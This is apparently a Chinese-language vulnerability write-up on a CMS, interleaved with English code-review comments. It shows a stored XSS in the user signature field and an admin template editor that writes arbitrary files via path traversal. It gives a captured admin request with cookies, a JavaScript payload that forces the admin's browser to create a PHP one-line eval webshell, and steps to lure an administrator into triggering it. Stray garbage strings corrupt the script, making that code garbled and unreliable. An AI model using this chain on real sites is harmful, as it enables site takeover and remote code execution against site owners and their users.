这个 CMS 以前 90 有人发了个 getshell,当时是后台验证文件的问题。
官网已经修补了,所以重新下了源码。
因为后台登入还需要认证码,所以注入就没看了。
存在 XSS。
漏洞文件:user/member/skin_edit.php
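<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php
/* Fix: $cscms_qianm is the user's stored signature. Echoing it raw lets a value
   containing "</textarea>" break out of the textarea and run script in whoever
   views the page (stored XSS). htmlspecialchars() entity-encodes it; the browser
   decodes the textarea content back to the same text, so the edit form is unchanged.
   Pass the site's page charset as the third argument if it is not PHP's default. */
echo htmlspecialchars($cscms_qianm, ENT_QUOTES); ?></textarea></td></tr>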
user/do.php
if ($op == 'zl') { // 资料 — profile update
    // All four fields are required; bail out before building the query.
    $incomplete = empty($CS_QQ) || empty($CS_Nichen) || empty($CS_City) || empty($CS_Email);
    if ($incomplete) {
        exit(Msg_Error('抱歉,请把资料填写完整!', 'javascript:history.go(-1);'));
    }

    // NOTE(review): each field is spliced straight into the SQL text and stored as-is.
    // Nothing in this block escapes for SQL or encodes for HTML (the signature CS_Qianm is
    // later echoed raw by skin_edit.php), so any filtering has to happen before $op is
    // dispatched — confirm that against the caller before relying on it.
    $sql = "update " . Getdbname('user') . " set CS_Nichen='" . $CS_Nichen . "',CS_Email='" . $CS_Email . "',"
         . "\nCS_Sex=" . $CS_Sex . ",CS_City='" . $CS_City . "',CS_QQ='" . $CS_QQ . "',CS_Qianm='" . $CS_Qianm . "'"
         . "\n where CS_Name='" . $cscms_name . "'";

    // Either outcome ends the request with a message and a history.go(-1) link.
    $notice = $db->query($sql) ? '恭喜您,修改成功了!' : '抱歉,修改失败了!';
    exit(Msg_Error($notice, 'javascript:history.go(-1);'));
}
没有过滤,导致 XSS 产生:签名在 skin_edit.php 中未经编码直接输出到 textarea 里,因此可以闭合 textarea 标签注入脚本。
后台看了下,很奇葩的是可以写任意格式的文件。
抓包如下:
POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 38
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594

name=aaa.php&content=%3Cs%3E%3Ca%25%3E
于是构造 JS 如下:
<script>
// Host is read from the page the script is running in (top frame), not hard-coded.
1 W' [1 a3 L! x5 X; a ^6 I1 C- K0 cthisTHost = top.location.hostname;2 U* C* y z5 X3 a8 y
+ g( q) F! O% V7 A4 W
// Request target: the admin template editor with a caller-supplied `path` containing
// `../../`. NOTE(review): the server-side handler is not shown here; the captured
// request above indicates it accepts this path and any file name, which is the bug
// to fix (confine `path` to the template root, reject non-template extensions).
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
8 n7 V' {) w" s2 [ 4 g/ M" L' ^1 A$ I
/**
 * Builds a hidden POST form with two fields, `name` and `content`, attaches it to
 * the document and submits it, navigating the page to `url`.
 *
 * This is an ordinary top-level form submission, so the browser attaches the
 * site's cookies to it exactly as it would for any navigation.
 *
 * @param {string} url  form action
 * @param {string} data value of the `name` field
 * @param {string} msg  value of the `content` field
 */
function PostSubmit(url, data, msg) {
    var form = document.createElement("FORM");
    document.body.appendChild(form);
    form.method = "POST";

    var fields = [["name", data], ["content", msg]];
    for (var i = 0; i < fields.length; i++) {
        var input = document.createElement("input");
        input.setAttribute("name", fields[i][0]);
        input.setAttribute("type", "hidden");
        form.appendChild(input);
        input.value = fields[i][1];
    }

    form.action = url;
    form.submit();
}
$ b1 D2 T5 a: X$ c) s/ R ' w) A& P8 k1 k
// Submits name=roker.php with a PHP body to the editor. Because this script is injected
// through the stored-XSS signature, it runs same-origin in the admin's session, so an
// anti-CSRF token alone would not stop it; the fixes are output-encoding the signature
// in skin_edit.php and rejecting non-template file names in the editor.
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");1 O2 L. o X# x% J
</script>
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 的修改签名处插入上述代码。
用你的账号给管理员写个私信,或者让他访问你的主页 http://127.0.0.1/home/?uid=2(uid 自己改),
就会在 skins\index\html\ 目录下生成 roker.php 一句话。